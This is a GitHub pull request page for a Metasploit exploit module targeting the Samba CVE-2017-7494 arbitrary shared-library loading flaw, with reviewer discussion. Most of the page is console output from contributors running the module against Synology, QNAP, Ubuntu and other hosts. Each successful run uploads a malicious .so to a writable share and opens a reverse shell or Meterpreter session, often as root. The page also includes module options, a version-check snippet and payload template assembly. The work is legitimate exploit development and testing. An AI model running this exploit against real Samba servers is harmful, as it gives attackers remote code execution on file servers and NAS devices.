Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

First crack at Samba CVE-2017-7494 #8450

Merged
merged 9 commits into from May 25, 2017
Merged

Conversation

@hdm
Copy link
Contributor

hdm commented May 25, 2017

This PR contains a module for the Samba arbitrary module loading vulnerability. It also includes support for x86 and ARMLE elf-so template formats. This has been extensively tested against an up to date Synology NAS and an Ubuntu 16.04 LTS x86_64 image. It needs testing against Linux ARMLE and Linux x86.

The default target is currently set to 2 (x86_64). Make sure to change this when testing other platforms.

Synology:

msf exploit(is_known_pipename) > run

[*] Started reverse TCP handler on 192.168.0.3:4444 
[*] 192.168.0.41:445 - Using location \\192.168.0.41\Temp\ for the path
[*] 192.168.0.41:445 - Payload is stored in //192.168.0.41/Temp/ as OofdIcVi.so
[*] 192.168.0.41:445 - Trying location /volume1/OofdIcVi.so...
[*] 192.168.0.41:445 - Trying location /volume1/Temp/OofdIcVi.so...
[*] Command shell session 2 opened (192.168.0.3:4444 -> 192.168.0.41:41100) at 2017-05-24 19:40:33 -0500

id
uid=0(root) gid=0(root) groups=0(root),100(users)

Ubuntu 16.04:

msf exploit(is_known_pipename) > exploit 

[*] Started reverse TCP handler on 192.168.0.3:4444 
[*] 192.168.0.3:445 - Using location \\192.168.0.3\yarp\h for the path
[*] 192.168.0.3:445 - Payload is stored in //192.168.0.3/yarp/h as GTithXJz.so
[*] 192.168.0.3:445 - Trying location /tmp/yarp/h/GTithXJz.so...
[*] Command shell session 6 opened (192.168.0.3:4444 -> 192.168.0.3:45076) at 2017-05-24 19:41:40 -0500

id
uid=65534(nobody) gid=0(root) groups=0(root),65534(nogroup)

The stuff left on my TODO for this (via additional PR if needed):

  • Look into other ways to exploit this without knowing the server-side path (/proc/self/cwd, etc)
  • Fingerprint specific OS configurations via blocking on FIFO pipe reads
  • Additional support for other architectures

It would be really neat if this could just cycle all possible architectures once it figured out a writeable path. If the module has trouble finding a writable path, you can specify it manually via SMB_SHARE_NAME, SMB_FOLDER, and SMB_SHARE_BASE.

@wvu-r7
Copy link
Member

wvu-r7 commented May 25, 2017

Coincidentally, I think this resolves #7723. Double win.

@busterb
Copy link
Member

busterb commented May 25, 2017

Nice, thanks for fixing the .so templates!

@h00die
Copy link
Contributor

h00die commented May 25, 2017

Synology DS412+ w/ INTEL Atom D2700 on DSM 6.1.1-15101 Update 2 (update 3 is current, will test that in a minute)

msf exploit(is_known_pipename) > exploit

[*] Started reverse TCP handler on 1.2.3.117:4444 
[*] 1.2.3.119:445 - Using location \\1.2.3.119\ESX\ for the path
[*] 1.2.3.119:445 - Payload is stored in //1.2.3.119/ESX/ as eePUbtdw.so
[*] 1.2.3.119:445 - Trying location /volume1/eePUbtdw.so...
[-] 1.2.3.119:445 - Probe: /volume1/eePUbtdw.so: The server responded with error: STATUS_OBJECT_NAME_NOT_FOUND (Command=162 WordCount=0)
[*] 1.2.3.119:445 - Trying location /volume1/ESX/eePUbtdw.so...
[*] Command shell session 1 opened (1.2.3.117:4444 -> 1.2.3.119:34366) at 2017-05-24 21:12:07 -0400

id
uid=0(root) gid=0(root) groups=0(root),100(users)
uname -a
Linux synologyNAS 3.10.102 #15101 SMP Fri May 5 12:01:38 CST 2017 x86_64 GNU/Linux synology_cedarview_412+
@OJ
Copy link
Contributor

OJ commented May 25, 2017

Scarily consistent output at my end too:

msf exploit(is_known_pipename) > run

[*] [2017.05.25-11:23:53] Started reverse TCP handler on <nope>:5555 
[*] [2017.05.25-11:23:54] <nope>:445 - Using location \\<nope>\<nope>\ for the path
[*] [2017.05.25-11:23:54] <nope>:445 - Payload is stored in //<nope>/<nope>/ as WDRFSUkE.so
[*] [2017.05.25-11:23:54] <nope>:445 - Trying location /volume1/WDRFSUkE.so...
[*] [2017.05.25-11:23:54] <nope>:445 - Trying location /volume1/<nope>/WDRFSUkE.so...
[*] Command shell session 2 opened (<nope>:5555 -> <nope>:40206) at 2017-05-25 11:23:54 +1000

id
uid=0(root) gid=0(root) groups=0(root),100(users)
uname -a
Linux NAS 3.10.102 #15101 SMP Fri May 5 12:01:38 CST 2017 x86_64 GNU/Linux synology_cedarview_1512+

👍

The module leaves the .so files behind on disk, I assume that cleanup isn't something that can happen until the session has finished, right?

@h00die
Copy link
Contributor

h00die commented May 25, 2017

same result after going fully up to date on mine (update 3).
I'll stab out some docs in a few min just so we're on the same page on whats been tested and confirmed and what hasn't

samba version 4.4.9 for the record

@wwebb-r7
Copy link
Contributor

wwebb-r7 commented May 25, 2017

No dice on armle based WD glorified-external-drive NAS. The module itself works just fine at first glance

sorry, my hostname is not very gh friendly

---:/shares/research# file /usr/sbin/samba_multicall 
/usr/sbin/samba_multicall: ELF 32-bit LSB executable, ARM, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.31, BuildID[sha1]=0x2f0327768cf7edf270387fdb1380fcd64e99b666, not stripped
---:/shares/research# file eRoaKgKM.so 
eRoaKgKM.so: ELF 32-bit LSB shared object, ARM, version 1 (SYSV), dynamically linked, stripped
---:/shares/research# uname -a
Linux --- 3.2.26 #1 SMP Thu Jul 9 11:14:15 PDT 2015 wd-2.4-rel armv7l GNU/Linux
---:/shares/research# 

I have some more armle devices I can test later and actually debug it without going through an act of congress. Probably won't get around to that until tomorrow evening at best.

@h00die
Copy link
Contributor

h00die commented May 25, 2017

module docs: hdm#15
@OJ need to know your DSM version and samba version if its isn't a DSM already listed
@wwebb-r7 what version of samba and what WD NAS OS is that?
@hdm need similar info on version numbers

@wvu-r7
Copy link
Member

wvu-r7 commented May 25, 2017

Works right out of the box (no configuration) on Samba 4.1.13 on Ubuntu 15.04 (my exploit dev VM).

msf exploit(is_known_pipename) > run

[*] Started reverse TCP handler on 192.168.33.1:4444 
[*] 192.168.33.129:445 - Using location \\192.168.33.129\[redacted]\ for the path
[*] 192.168.33.129:445 - Payload is stored in //192.168.33.129/[redacted]/ as ITmrMclX.so
[*] 192.168.33.129:445 - Trying location /volume1/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /volume1/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /volume1/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /volume1/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /volume2/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /volume2/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /volume2/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /volume2/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /volume3/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /volume3/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /volume3/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /volume3/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /shared/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /shared/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /shared/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /shared/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /mnt/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /mnt/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /mnt/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /mnt/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /mnt/usb/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /mnt/usb/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /mnt/usb/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /mnt/usb/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /media/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /media/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /media/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /media/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /mnt/media/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /mnt/media/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /mnt/media/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /mnt/media/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /var/samba/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /var/samba/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /var/samba/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /var/samba/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /tmp/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /tmp/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /tmp/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /tmp/[redacted]/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /home/ITmrMclX.so...
[*] 192.168.33.129:445 - Trying location /home/[redacted]/ITmrMclX.so...
[*] Sending stage (2849784 bytes) to 192.168.33.129
[*] Meterpreter session 1 opened (192.168.33.1:4444 -> 192.168.33.129:56646) at 2017-05-24 21:24:14 -0500

meterpreter > 

I did switch to Meterpreter (Mettle), though. :-)

@wvu-r7
Copy link
Member

wvu-r7 commented May 25, 2017

Just updated!

@busterb
Copy link
Member

busterb commented May 25, 2017

Tested template on an Ubuntu 17.04 chroot on an ARMv7 chromebook, similar results to above. Looks like an .so ABI mismatch:

bcook@localhost:/var/opt/bcook$ file /lib/arm-linux-gnueabihf/ld-2.24.so 
/lib/arm-linux-gnueabihf/ld-2.24.so: ELF 32-bit LSB shared object, ARM, EABI5 version 1 (SYSV), dynamically linked, BuildID[sha1]=8b848f4f76562d20faf06ff375f30318c696fd82, stripped
bcook@localhost:/var/opt/bcook$ file /var/opt/bcook/QCwTHZfa.so 
/var/opt/bcook/QCwTHZfa.so: ELF 32-bit LSB shared object, ARM, version 1 (SYSV), dynamically linked, stripped
bcook@localhost:/var/opt/bcook$ LD_PRELOAD=/var/opt/bcook/QCwTHZfa.so /bin/true
ERROR: ld.so: object '/var/opt/bcook/QCwTHZfa.so' from LD_PRELOAD cannot be preloaded (cannot open shared object file): ignored.

ii samba 2:4.4.5+dfsg-2ubuntu5.5 armhf SMB/CIFS file, print, and login server for Unix

I suspect we need to use EABI for the arm template, which is a lot more common these days than the original OABI spec. Might be nice if metasploit accounted for things like ABI specs, but for now we probably need to just go with most-common denominator.

@busterb
Copy link
Member

busterb commented May 25, 2017

I guess we can consider 'armle' in metasploit equivalent to 'armel' and should be either EABI or OABI (still reading on differences). We could perhaps add an ARCH_ARMHF architecture as well for ARMv7+ EABI support.

https://wiki.embeddedarm.com/wiki/EABI_vs_OABI

@wwebb-r7
Copy link
Contributor

wwebb-r7 commented May 25, 2017

Without explaining my network topology, I can't check right now. Sorry getting a migraine or something similar.

I don't even have linux on this laptop for more RE tools, but the ARM file trips up IDA as well

illegal

Best effort I've got at the moment

@wvu-r7 wvu-r7 self-assigned this May 25, 2017
@nixawk
Copy link
Contributor

nixawk commented May 25, 2017

Could we add a method to check vulnerable versions ?

def check
  # vulnerable version match
end

screen shot 2017-05-24 at 23 24 21

Bug Flow

  1. is_known_pipename (./source3/rpc_server/srv_pipe.c)
  2. smb_probe_module (./lib/util/modules.c)
  3. do_smb_load_module (./lib/util/modules.c)
  4. load_module (./lib/util/modules.c)
  5. dlopen
@bcoles
Copy link
Contributor

bcoles commented May 25, 2017

@nixawk I don't see why not. Could also verify OS. Here's some spaghetti code using smb_fingerprint:

def check
    res = smb_fingerprint

    os = res['os']
    vprint_status("Operating System: #{os}")

    if os =~ /Windows/i
      vprint_status('Target operating system not supported')
      return CheckCode::Safe
    end

    smb_version = res['native_lm'].scan(/Samba ([\d\.]+)/).flatten.first
    vprint_status("Samba version: #{smb_version}")

    # 3.x and 4.x branches affected
    if smb_version !~ /^[34]\./
      return CheckCode::Safe
    end

    # 3.x branch - versions prior to 3.5.0 are safe
    if smb_version =~ /^3\.[0-4]\./
      return CheckCode::Safe
    end

    # 4.x branch - patched in 4.4.14 / 4.5.10 / 4.6.4
    if smb_version =~ /^4\./ 
      if smb_version !~ /^4\.([0-3]\.|4\.[0-9]|4\.1[0-3]|5\.[0-9]|6\.[0-3])$/
        return CheckCode::Safe
      end
    end

    connect
    smb_login
    find_writeable_share_path
    disconnect

    if @share.to_s.eql?('')
      vprint_status('Could not find a writeable share')
      return CheckCode::Detected
    else
      vprint_status("Found writeable share: #{@share}")
      return CheckCode::Appears
    end

    CheckCode::Safe
end
@bcoles
Copy link
Contributor

bcoles commented May 25, 2017

+1 for not working with ARM. Tested with QNAP NAS.

$ uname -a
Linux --- 3.2.26 #2 SMP Tue May 16 06:17:55 CST 2017 armv7l unknown
$ smb2status
smbd (samba daemon) Version 4.4.9
@jhart-r7
Copy link
Contributor

jhart-r7 commented May 25, 2017

@bcoles @nixawk , I've got a WIP commit that should help with the checking part of this. Coincidentally it is similar to @bcoles' POC.

#8452

@Medicean
Copy link

Medicean commented May 25, 2017

Works right 👍 👍

msf > use exploit/linux/samba/is_known_pipename
msf exploit(is_known_pipename) > set RHOST 192.168.35.197
RHOST => 192.168.35.197
msf exploit(is_known_pipename) > show options

Module options (exploit/linux/samba/is_known_pipename):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   RHOST           192.168.35.197   yes       The target address
   RPORT           445              yes       The SMB service port (TCP)
   SMB_FOLDER                       no        The directory to use within the writeable SMB share
   SMB_SHARE_BASE                   no        The remote filesystem path correlating with the SMB share name
   SMB_SHARE_NAME                   no        The name of the SMB share containing a writeable directory


Exploit target:

   Id  Name
   --  ----
   2   Linux x86_64


msf exploit(is_known_pipename) > run

[*] Started reverse TCP handler on 192.168.35.197:4444
[*] 192.168.35.197:445 - Using location \\192.168.35.197\share\ for the path
[*] 192.168.35.197:445 - Payload is stored in //192.168.35.197/share/ as dDUJiiuf.so
[*] 192.168.35.197:445 - Trying location /volume1/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /volume1/share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /volume1/SHARE/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /volume1/Share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /volume2/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /volume2/share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /volume2/SHARE/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /volume2/Share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /volume3/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /volume3/share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /volume3/SHARE/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /volume3/Share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /shared/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /shared/share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /shared/SHARE/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /shared/Share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /mnt/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /mnt/share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /mnt/SHARE/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /mnt/Share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /mnt/usb/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /mnt/usb/share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /mnt/usb/SHARE/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /mnt/usb/Share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /media/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /media/share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /media/SHARE/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /media/Share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /mnt/media/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /mnt/media/share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /mnt/media/SHARE/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /mnt/media/Share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /var/samba/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /var/samba/share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /var/samba/SHARE/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /var/samba/Share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /tmp/dDUJiiuf.so...
[*] Command shell session 1 opened (192.168.35.197:4444 -> 192.168.35.197:58089) at 2017-05-25 13:26:19 +0800

id
uid=65534(nobody) gid=0(root) groups=0(root),65534(nogroup)

whoami
nobody

phdrsize equ $ - phdr
dd 2 ; p_type = PT_DYNAMIC
dd 7 ; p_flags = rwx

This comment has been minimized.

Copy link
@timwr

timwr May 25, 2017

Contributor

p_flags needs to move to after p_memsz (like in the PT_LOAD section)

This comment has been minimized.

Copy link
@hdm

hdm May 25, 2017

Author Contributor

Have you tested with this change?

This comment has been minimized.

Copy link
@timwr

timwr May 25, 2017

Contributor

I'm struggling to get a decent test environment set up. I can test with LD_PRELOAD on Android and Linux debian-armel 3.2.0-4-versatile #1 Debian 3.2.51-1 armv5tejl GNU/Linux. Neither are working for me (even after this change).

@Marin111
Copy link

Marin111 commented May 25, 2017

for centos6.5 it's not success

@xmycroftx
Copy link

xmycroftx commented May 25, 2017

Osx uses smbx which supposedly happened to avoid smb3(gplv3). Worth a test though.

@hdm
Copy link
Contributor Author

hdm commented May 25, 2017

Thanks folks! Sounds like we need to:

  • Fix ARMLE support
  • Look into Mac OS X support
  • Delete the .so after the module completes

Additionally, Mr. Tavis Ormandy suggested a nice way to exploit this without knowing the path using two connections and /proc/self/cwd, which I will try to implement in the near future (this PR if its languishing or the next one).

I would love some help for ARMLE, MIPS, and OS X (for .so templates).

@bcoles
Copy link
Contributor

bcoles commented May 25, 2017

@hiw0rld do you have a stack trace? I don't see .dup used anywhere in this PR.

@busterb
Copy link
Member

busterb commented May 25, 2017

Dear spectators - a pull request is a work-in-progress. If you do not know how to debug problems, pull code into your branch, or to expect some rough edges, then please abstain from commenting until this pull request has been merged. Otherwise it becomes noise that simply slows down progress. Thanks!

@tsellers-r7
Copy link

tsellers-r7 commented May 25, 2017

@bcoles @hdm @wvu-r7

FYI, if you implement vulnerability checking please keep in mind that at least some versions of Samba include Windows in the Native OS value.

For example, on Kali with Samba 4.5.6 installed:

user@kali:~$ smbd --version
Version 4.5.6-Debian

Wireshark image:
screen shot 2017-05-25 at 8 39 21 am

Reference:
https://github.com/samba-team/samba/blob/aa43d0d81baa497135a17e843b05336b4a504809/source3/smbd/sesssetup.c#L50

Looks like this was changed from Unix to Windows in January 2014, released in 4.1.12 or 4.1.13 (I think) :
samba-team/samba@666948c

@hashtaginfosec
Copy link

hashtaginfosec commented May 25, 2017

Ran it against Synology Disk Station DS212j and got no-access and STATUS_ACCOUNT_DISABLED. I think this is because default admin account is disabled.

[*] Started reverse TCP handler on 192.168.1.100:4444
[-] 192.168.1.101:445 - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_ACCOUNT_DISABLED (Command=115 WordCount=0)
[*] Exploit completed, but no session was created.
@Viss
Copy link

Viss commented May 25, 2017

synology nas DS1815+ vulnerable as well!

@0x00string
Copy link

0x00string commented May 25, 2017

I'm getting the following error when running the exploit against:

Linux HOSTNAME 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux

With samba version:

Version 4.3.11-Ubuntu

[-] 172.20.32.4:445 - Exploit failed: Rex::Proto::SMB::Exceptions::NoReply The SMB server did not reply to our request

Exploits dies after getting a RST in response to Tree Disconnect after uploading the test .txt file.

my smb.conf lines for the shares are as follows:

[sambashare]
path = /sambashare
browsable = yes
public = yes
writable = yes
guest ok = yes
create mask = 0644
directory mask = 0755
force user = shareuser

[simple]
path = /simpleshare
public = yes
writeable = yes
guest ok = yes
browsable = yes

Thanks to @hdm for inadvertently fixing my msfvenom bug too!

@egypt
Copy link
Contributor

egypt commented May 25, 2017

@hdm how close would you say this is to done? Would it be reasonable to land this in its current state and continue dev in a new PR?

@wvu-r7
Copy link
Member

wvu-r7 commented May 25, 2017

I'm ready to ship this. It works quite well.

@hdm
Copy link
Contributor Author

hdm commented May 25, 2017

@egypt This should be good to go for now, I added the BruteforcePID advanced option for folks who want to test, but its disabled by default. The code now also autodeletes the payload from the share.

@hdm
Copy link
Contributor Author

hdm commented May 25, 2017

Should we disable the ARM target or forcibly set 'SHELL' on the payload option?

@hdm
Copy link
Contributor Author

hdm commented May 25, 2017

@QasimChadhar That happens when Guest is 'disabled'

@hdm
Copy link
Contributor Author

hdm commented May 25, 2017

@reznok Double check to make sure the patch wasn't automatically installed

hdm added 2 commits May 25, 2017
@h00die
Copy link
Contributor

h00die commented May 25, 2017

The PR for the docs is ready to land before this is landed. It's good enough for the time being

docs for is_known_pipename
wvu-r7 added a commit to wvu-r7/metasploit-framework that referenced this pull request May 25, 2017
@wvu-r7 wvu-r7 merged commit 4ec5831 into rapid7:master May 25, 2017
1 check was pending
1 check was pending
continuous-integration/travis-ci/pr The Travis CI build is in progress
Details
@OJ
Copy link
Contributor

OJ commented May 25, 2017

Nice

@hiw0rld
Copy link

hiw0rld commented May 26, 2017

@bcoles I dont use any stack trace you mean client or samba server?

@hdm hdm deleted the hdm:module/CVE-2017-7494 branch May 26, 2017
@nixawk
Copy link
Contributor

nixawk commented May 26, 2017

Bug Flow

-> /path/to/samba-X.X.XX

bug-flow

@hdm
Copy link
Contributor Author

hdm commented May 28, 2017

Maybe time to lock this PR for future comments?

@wvu-r7
Copy link
Member

wvu-r7 commented May 28, 2017

Agreed. This is not a support forum, folks. Take it to IRC or the Rapid7 Community site. File a ticket if it's a bug.

@rapid7 rapid7 locked and limited conversation to collaborators May 28, 2017
@h00die h00die added the docs label May 29, 2017
@alrosenthal-r7
Copy link

alrosenthal-r7 commented May 31, 2017

Release Notes

The exploits/linux/samba/is_known_pipename module has been added to the framework. This module exploits Samba from versions 3.5.0-4.4.14, 4.5.10, and 4.6.4 by loading a malicious shared library. The exploit requires valid credentials, a writeable folder in an accessible share, and the server-side path of the writeable folder. However, in some cases anonymous access with common filesystem locations can be used to automate exploitation.

@hdm
Copy link
Contributor Author

hdm commented Jun 1, 2017

^ no longer true with the current PR.

@h00die
Copy link
Contributor

h00die commented Jun 1, 2017

May need to update the docs and info section (or just the docs). I have a note to review and update the MD tomorrow to update

Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Projects
None yet
Linked issues

Successfully merging this pull request may close these issues.

None yet

You can’t perform that action at this time.